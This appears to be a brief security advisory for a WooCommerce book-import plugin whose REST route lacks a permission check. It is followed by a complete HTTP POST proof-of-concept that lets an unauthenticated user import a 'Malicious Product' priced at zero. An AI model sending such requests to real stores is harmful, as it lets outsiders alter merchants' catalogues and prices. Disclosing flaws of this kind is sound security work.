The plugin did not correctly check for permission in its wc/v3/bcsbertlinebookimport REST route, allowing unauthenticated to import arbitrary products or update existing ones
POST /wp-json/wc/v3/bcsbertlinebookimport HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 200
Connection: close
<?xml version="1.0" encoding="UTF-8" ?>
<books><book><isbn>123</isbn><title>Malicious Product</title><content>YOLO</content><price>0</price><stock>2</stock></book></books>